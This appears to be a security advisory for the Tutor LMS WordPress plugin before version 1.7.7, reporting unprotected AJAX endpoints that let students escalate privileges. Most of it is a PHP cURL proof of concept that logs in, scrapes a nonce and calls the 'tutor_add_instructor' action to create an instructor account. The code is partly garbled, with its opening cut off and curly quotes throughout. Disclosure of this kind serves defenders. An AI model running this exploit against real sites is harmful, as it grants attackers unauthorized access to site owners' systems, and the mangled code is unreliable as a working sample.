Tutor LMS < 1.7.7 - Unprotected AJAX including Privilege Escalation

Several AJAX endpoints in the plugin were unprotected, allowing students to modify course information and elevate their privileges among many other actions.

PoC

Only one PoC provided for privilege escalation. $wp_user, ‘pwd’ => $wp_pass, ‘rememberme’ => ‘forever’, ‘wp-submit’ => ‘Log+In’, ]); $output = curl_exec($ch); curl_close($ch); // Pull the Nonce $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/wp-admin/index.php’); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($ch); curl_close($ch); preg_match(‘/var\stutor_data\s=\s{“delete_confirm_text”:“Are you sure?\sit\scan\snot\sbe\sundone\.”,“nonce_key”:“_wpnonce”,“_wpnonce”:“([^”]+)"/’, $content, $matches); $nonce = $matches[1]; print_r($nonce); // Update Settings $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/wp-admin/admin-ajax.php’); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ ‘first_name’ => ‘Instructor’, ‘last_name’ => ‘Instructor’, ‘user_login’ => ‘Instructor’, ‘email’ => ‘[email protected]’, ‘phone_number’ => ‘1234567890’, ‘password’ => ‘test’, ‘password_confirmation’ => ‘test’, ‘tutor_profile_bio’ => ‘’, ‘action’ => ‘tutor_add_instructor’, ‘_wpnonce’ => $nonce ]); $output = curl_exec($ch); curl_close($ch); print_r($output);